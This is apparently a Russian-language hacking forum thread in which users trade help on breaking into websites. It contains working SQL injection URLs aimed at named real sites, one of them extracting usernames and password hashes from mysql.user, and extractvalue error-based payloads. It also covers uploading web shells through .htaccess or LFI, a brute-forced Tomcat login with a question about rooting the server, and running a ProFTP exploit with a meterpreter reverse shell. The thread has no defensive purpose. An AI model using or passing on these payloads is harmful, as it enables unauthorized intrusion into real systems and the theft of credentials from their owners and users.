Смотря при каких обстоятельствах. Из под админки загрузить файл с вредоносом - одно, при LFI - уже совсем другое, обойти преобразование типов, resize - вообще третье. Так что информации очень мало для однозначного ответа.
Шелл можно вписать в любой из этих форматов. Другое дело, что при нормальных настройках ни один из них не будет исполняться веб-сервером. Поэтому вам надо либо догружать .htaccess, либо делать lfi. Либо же обходить фильтры на формат\расширение.
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,2,3 ,4,5,6,7,8,9,10,11+--+ Не могу найти путь к корню сайта
Я пошел по пути родителя, хотя он уже и на другом сервере: http://flb.ru/user_config.php "Fatal error: Class 'User' not found in /var/www/flb.ru/user_config.php on line 10" В гуглкеш нашлось такое: "Warning: mysql_connect() [function.mysql-connect]: Can't connect to MySQL server on '95.211.1.162' (4) in /home/u475266731/public_html/portal-object/db/dbconnect.obj.php on line 45" В общем, я бы посоветовал ковырять в сторону соседей.
Подобрал пароль от Apache Tomcat/7.0.47 Что можно там сделать? Есть ли способ порутать сервак полностью?
Проблемка есть таблица user узнаем колонки http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x75736572+--+ Далее делаю http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat(User,0x3b,Password),4,5+from+user+--+ И результат: ПУСТОТА! Need help!
укажи с какой БД хочешь вытащить, например mysql http://www.yulsun.ru/index.php?katalog=s454e435&tipavto=1&setmanuf=579&setmod=7967&settyp=30716&shgruptov=-8+union+select+1,2,group_concat%28User,0x3b,Password%29,4,5+from+mysql.user-- список БД
Парни помогите ответить на вопросы,если можно на примерах! Если кто-то всё это знает,помогите,Не обижу
сам понял что спросил? тебя в гугле забанили? омг, ты реально такой тупой или шутишь? в гугл вбиваешь слово лох и вот тебе куча ресурсов руками блэть та не, нефига)) если бы была выбрана не та БД то написало бы ошибку, нужно вывод взять в substr
YaBtr где можно почитать про extractvalue? ?query=1'*(extractvalue(1,concat(0x3a,uSer(),0x3a,file_priv)+from+mySql.uSer))*%20'&x=0&y=0 почему не работает? синтаксис у меня кривой или прав нету?
1. И синтаксис кривой и прав не хватает. 2. http://dev.mysql.com/doc/refman/5.1/en/xml-functions.html Там же написано об updatexml.
Юзаю вот этот сплойт proftp_telnet_iac+meterpreter/reverse_tcp. Какой порт нужно прописывать в reverse_tcp(LPORT)? И нужно ли его открывать ?
SQL движок Есть несколько скулей типа: host.com/page.php?id=19' and 1=(select 1) -- движок например точно не mysql - запрос c /*!00000 some_shit */ срабатывает - если бы был мускул, была бы ошибка в синтаксисе - some_shit, ни Oracle - запрос host.com/page.php?id=19' and 1=(select 1 from sys.dual) -- не работает. если бы была mssql или postgre, то в большинстве случаев сработал бы запрос с Select из таблицы information_schema.tables - host.com/page.php?id=19' and 1=(select 1 from information_schema.tables) но не работает. и ещё одна особенность - и ни в одной из скуль не проходит запрос с ORDER BY. что это может быть за движок?
Движок или субд? Ссылку в студию\пм, посмотрим на ваш движок и на субд. Причин для невыполнения упомнутых запросов может быть масса, и большая часть не относится непосредственно к самой субд.
madhatter, СУБД. сайт находится в локалке, так что от ссылки, к сожалению, не будет толку. Если представить, что запрос не фильтруется, то для какой СУБД характерно такое поведение? Ещё очень характерная особенность! срабатывает такой запрос: host.com/page.php?id=19' and 1<(select id) то есть можно выбрать колонку id без указания в запросе ключевого слова FROM и таблицы, из которой нужно делать запрос. Сам я пока думаю, что выполняется не простой запрос какая-нибудь хранимая процедура.
